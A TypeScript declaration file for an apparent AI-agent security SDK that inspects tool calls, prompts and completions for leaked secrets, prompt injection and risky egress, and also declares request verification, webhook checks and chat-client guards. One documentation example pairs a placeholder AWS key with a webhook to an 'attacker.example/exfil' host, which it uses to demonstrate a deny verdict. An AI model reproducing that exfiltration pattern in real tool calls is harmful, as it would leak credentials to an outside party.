export { A as AxioRank, R as RealtimeGuard, a as RealtimeGuardKind, b as RealtimeGuardOptions, c as RealtimeGuardResult, d as createRealtimeGuard } from './realtime-2_qrG_jy.js';
import { LocalDecision } from '@axiorank/detectors';
import { d as ToolCallSignal, C as CardVerifyResult, T as ToolCallResult, e as AxioGuardOptions, f as VerifyRequestResult, g as VerifySurfaceParams } from './types-C6RfE7pX.js';
export { A as AxioRankOptions, c as AxioTrace, h as CardDecision, i as ChallengeInstruction, D as Decision, I as InboundDecision, j as InboundSurfaceKind, P as ProtocolId, S as SignalCategory, a as ToolCallParams, k as VerificationMethod, l as VerificationStatus, V as VerifyCardParams } from './types-C6RfE7pX.js';

/**
 * Result of a LOCAL inspection - the same detectors and risk scoring the hosted
 * gateway runs, evaluated in-process against the default policy. No API key, no
 * network, no signup.
 */
interface InspectResult {
    /**
     * Advisory verdict under the default posture (deny on a live secret, a
     * destructive op, or risk >= 75). The hosted gateway applies YOUR workspace's
     * real policy (custom rules, approvals/holds, budgets, information-flow
     * control, the ML flow judge, kill-chain correlation) and may decide
     * differently - route the call through `new AxioRank(...).enforce()` to enforce.
     */
    decision: LocalDecision;
    /** Risk score (0-100) the engine assigned. */
    risk: number;
    /** Human-readable explanation for the decision. */
    reason: string;
    /** The content-inspection findings that drove the score. */
    signals: ToolCallSignal[];
    /** A structural copy of the input with secret spans masked in place. */
    redactedPayload: Record<string, unknown>;
}
/**
 * Inspect a tool call locally - in-process, with no API key and no network.
 *
 * Runs the exact AxioRank detectors (leaked secrets, prompt injection,
 * destructive operations, PII, risky egress) and risk scoring the hosted
 * gateway runs, then resolves an advisory `allow` / `deny` under the default
 * policy. Use it to see what AxioRank catches in seconds, then route real
 * traffic through {@link AxioRank.enforce} to enforce centrally with your own
 * policy, an audit trail, approvals, and multi-step kill-chain correlation.
 *
 * Pure and synchronous; safe in Node, edge, and the browser. Plain payloads are
 * scored identically to the gateway; the gateway additionally decodes deeply
 * nested base64/hex/gzip wrappers and writes a salted-SHA-256 audit fingerprint.
 *
 * @example
 * ```ts
 * import { inspect } from "@axiorank/sdk";
 *
 * const r = inspect("aws.s3.putObject", {
 *   body: "AKIAIOSFODNN7EXAMPLE",
 *   webhook: "http://attacker.example/exfil",
 * });
 * console.log(r.decision, r.risk, r.signals.map((s) => s.detector));
 * // → "deny" 96 ["secret.aws_access_key", ...]
 * ```
 */
declare function inspect(tool: string, args?: Record<string, unknown>): InspectResult;
/**
 * Inspect a tool's RESULT (or any freeform text) locally - the result-phase
 * counterpart to {@link inspect}. Catches indirect prompt injection, a leaked
 * secret, or PII in what a tool returned BEFORE your agent ingests it. No API
 * key, no network.
 *
 * @example
 * ```ts
 * const page = await fetchUrl(url);
 * const r = inspectText("web.fetch", page);
 * if (r.decision === "deny") {
 *   // strip or quarantine untrusted content before the model sees it
 * }
 * ```
 */
declare function inspectText(tool: string, text: string): InspectResult;
/**
 * Inspect an LLM PROMPT locally - the model-input guardrail. Catches prompt
 * injection, jailbreak attempts, and a secret or PII leaking INTO the prompt,
 * before you send it to the model. No API key, no network.
 *
 * @example
 * ```ts
 * const r = inspectPrompt(userMessage);
 * if (r.decision === "deny") throw new Error("blocked prompt: " + r.reason);
 * ```
 */
declare function inspectPrompt(text: string): InspectResult;
/**
 * Inspect an LLM COMPLETION locally - the model-output guardrail. Catches
 * injected instructions in the output, PII egress, and a leaked secret in what
 * the model returned, before it reaches a user or a downstream tool. No API key,
 * no network.
 *
 * @example
 * ```ts
 * const out = await model.generate(prompt);
 * const r = inspectCompletion(out.text);
 * if (r.decision === "deny") out.text = "[response withheld]";
 * ```
 */
declare function inspectCompletion(text: string): InspectResult;

/** Base class for all errors thrown by the SDK. */
declare class AxioRankError extends Error {
    constructor(message: string);
}
/** Thrown when the API key is missing, invalid, or revoked (HTTP 401). */
declare class AxioRankAuthError extends AxioRankError {
    constructor(message?: string);
}
/** Thrown for malformed requests, timeouts, and other non-2xx responses. */
declare class AxioRankRequestError extends AxioRankError {
    status?: number;
    constructor(message: string, status?: number);
}
/** Thrown by {@link AxioRank.enforce} when the gateway denies the call. */
declare class AxioRankDeniedError extends AxioRankError {
    result: ToolCallResult;
    constructor(result: ToolCallResult);
}
/** Thrown by the chat guards when a prompt or completion is blocked locally. */
declare class AxioRankGuardError extends AxioRankError {
    /** Which side of the model call was blocked. */
    phase: "prompt" | "completion";
    risk: number;
    reason: string;
    constructor(phase: "prompt" | "completion", reason: string, risk: number);
}
/** Thrown by {@link AxioRank.enforceCard} when the preflight verdict is `deny`. */
declare class AxioRankCardDeniedError extends AxioRankError {
    result: CardVerifyResult;
    constructor(result: CardVerifyResult);
}
/** Thrown when the workspace is rate-limited (HTTP 429) after retries are exhausted. */
declare class AxioRankRateLimitError extends AxioRankError {
    retryAfterSec?: number;
    constructor(message?: string, retryAfterSec?: number);
}
/** Thrown by {@link constructEvent} when a webhook signature is missing, stale, or invalid. */
declare class AxioRankWebhookSignatureError extends AxioRankError {
    constructor(message?: string);
}

/**
 * Verify an inbound request against AxioRank: collect the request metadata
 * (method, path, the Web Bot Auth signature headers, a bounded body sample),
 * POST it to the verify endpoint, and resolve with the verdict.
 *
 * Framework-agnostic - takes a standard `Request`, so it works in Next.js
 * middleware, Hono, Express (via a Request shim), or Workers. Throws only on a
 * misconfigured site key (401); any transport failure resolves to a synthetic
 * `onError` verdict so a verification outage never breaks the caller's site.
 */
declare function verifyRequest(req: Request, options: AxioGuardOptions): Promise<VerifyRequestResult>;

/**
 * Verify the agent reaching into a NON-website surface you operate - an MCP
 * server, an A2A agent, an HTTP API, or a webhook - where there is no standard
 * `Request` to hand to {@link verifyRequest}. You supply the caller's identity
 * material directly (a signed card for mcp/a2a, an OAuth token or mTLS/SPIFFE id
 * for http_api), AxioRank verifies it, and the result carries the verdict plus a
 * per-kind `challenge` instruction to enforce a non-allow decision.
 *
 * Throws only on a misconfigured site key (401); any transport failure resolves
 * to a synthetic `onError` verdict so a verification outage never breaks you.
 *
 * @example MCP server you expose
 * const result = await verifySurface(
 *   { surfaceKind: "mcp_server", operation: "tools/call", agentCard: incomingCard },
 *   { apiKey: process.env.AXIORANK_SITE_KEY! },
 * );
 * if (result.decision !== "allow") throw rpcError(result.challenge);
 */
declare function verifySurface(params: VerifySurfaceParams, options: AxioGuardOptions): Promise<VerifyRequestResult>;

/**
 * Drop-in guard for a site's edge/middleware. Returns a `Response` to short
 * the request (403 block / 401 or custom challenge) or `undefined` to let it
 * continue - exactly the contract a Next.js middleware expects, with no
 * `next/server` dependency (a standard `Request`/`Response` works everywhere).
 *
 * @example
 * ```ts
 * // middleware.ts
 * import { axioGuard } from "@axiorank/sdk";
 * export const middleware = axioGuard({
 *   apiKey: process.env.AXIORANK_SITE_KEY!,
 *   onChallenge: (req) =>
 *     Response.redirect(new URL("/verify-human", req.url), 302),
 * });
 * export const config = { matcher: ["/api/:path*", "/admin/:path*"] };
 * ```
 */
declare function axioGuard(options: AxioGuardOptions): (req: Request) => Promise<Response | undefined>;

interface WebhookEvent {
    /** Stable idempotency id - dedupe on this. */
    id: string;
    /** Public event type, e.g. "tool_call.evaluated". */
    type: string;
    data: Record<string, unknown>;
    /** Present on a replayed delivery - the original event id. */
    replayOf?: string;
}
interface VerifyWebhookOptions {
    /** Max clock skew (seconds) before a delivery is rejected as a replay. Default 300. */
    toleranceSec?: number;
    /** Injectable clock (unix seconds) for testing. */
    nowSec?: number;
}
/**
 * Verify the `Axiorank-Signature` header against the raw body. Returns false on a missing,
 * malformed, stale, or mismatched signature - never throws.
 */
declare function verifyWebhookSignature(rawBody: string, signatureHeader: string | null | undefined, secret: string, options?: VerifyWebhookOptions): Promise<boolean>;
/**
 * Verify the signature and parse the body in one call. Throws
 * {@link AxioRankWebhookSignatureError} on a bad/stale/missing signature or non-JSON body;
 * otherwise returns the typed event. Dedupe on `event.id` (delivery is at-least-once).
 */
declare function constructEvent(rawBody: string, signatureHeader: string | null | undefined, secret: string, options?: VerifyWebhookOptions): Promise<WebhookEvent>;

interface ChatGuardOptions {
    /**
     * On a denied prompt or completion: `"throw"` (default) raises
     * {@link AxioRankGuardError}; `"return"` lets the call proceed and surfaces the
     * verdict via {@link ChatGuardOptions.onDecision} instead of throwing, so the
     * caller decides what to do.
     * @default "throw"
     */
    onDeny?: "throw" | "return";
    /** Observe every verdict (prompt and completion). Errors here are swallowed. */
    onDecision?: (phase: "prompt" | "completion", result: InspectResult) => void;
    /** Skip scoring the prompt (guard the output only). @default false */
    skipPrompt?: boolean;
    /** Skip scoring the completion (guard the input only). @default false */
    skipCompletion?: boolean;
}

/**
 * Drop-in model-I/O guardrails for the OpenAI and Anthropic chat APIs. Each wraps
 * the client's `create` so the PROMPT is scored before the model runs and the
 * COMPLETION is scored after, blocking prompt injection, jailbreaks, and a secret
 * or PII leaking in or out. Detection is local and in-process (no key, no
 * network), the same engine the hosted gateway runs.
 *
 * The clients are typed structurally, so these add no dependency on the openai or
 * @anthropic-ai/sdk packages.
 *
 * @example OpenAI
 * ```ts
 * import OpenAI from "openai";
 * import { guardOpenAIChat } from "@axiorank/sdk";
 *
 * const openai = new OpenAI();
 * const chat = guardOpenAIChat(openai.chat.completions, { onDeny: "throw" });
 * const res = await chat.create({ model: "gpt-4.1", messages });
 * ```
 *
 * @example Anthropic
 * ```ts
 * import Anthropic from "@anthropic-ai/sdk";
 * import { guardAnthropicMessages } from "@axiorank/sdk";
 *
 * const anthropic = new Anthropic();
 * const messages = guardAnthropicMessages(anthropic.messages);
 * const msg = await messages.create({ model: "claude-opus-4-8", max_tokens: 1024, messages: msgs });
 * ```
 */

interface OpenAIMessage {
    role: string;
    content: unknown;
}
/** Wrap `openai.chat.completions` so every create() is guarded on both sides. */
declare function guardOpenAIChat<B extends {
    messages: OpenAIMessage[];
}, R>(completions: {
    create: (body: B) => Promise<R>;
}, opts?: ChatGuardOptions): {
    create: (body: B) => Promise<R>;
};
interface AnthropicMessage {
    role: string;
    content: unknown;
}
/** Wrap `anthropic.messages` so every create() is guarded on both sides. */
declare function guardAnthropicMessages<B extends {
    messages: AnthropicMessage[];
}, R>(messages: {
    create: (body: B) => Promise<R>;
}, opts?: ChatGuardOptions): {
    create: (body: B) => Promise<R>;
};

export { AxioGuardOptions, AxioRankAuthError, AxioRankCardDeniedError, AxioRankDeniedError, AxioRankError, AxioRankGuardError, AxioRankRateLimitError, AxioRankRequestError, AxioRankWebhookSignatureError, CardVerifyResult, type ChatGuardOptions, type InspectResult, ToolCallResult, ToolCallSignal, VerifyRequestResult, VerifySurfaceParams, type VerifyWebhookOptions, type WebhookEvent, axioGuard, constructEvent, guardAnthropicMessages, guardOpenAIChat, inspect, inspectCompletion, inspectPrompt, inspectText, verifyRequest, verifySurface, verifyWebhookSignature };
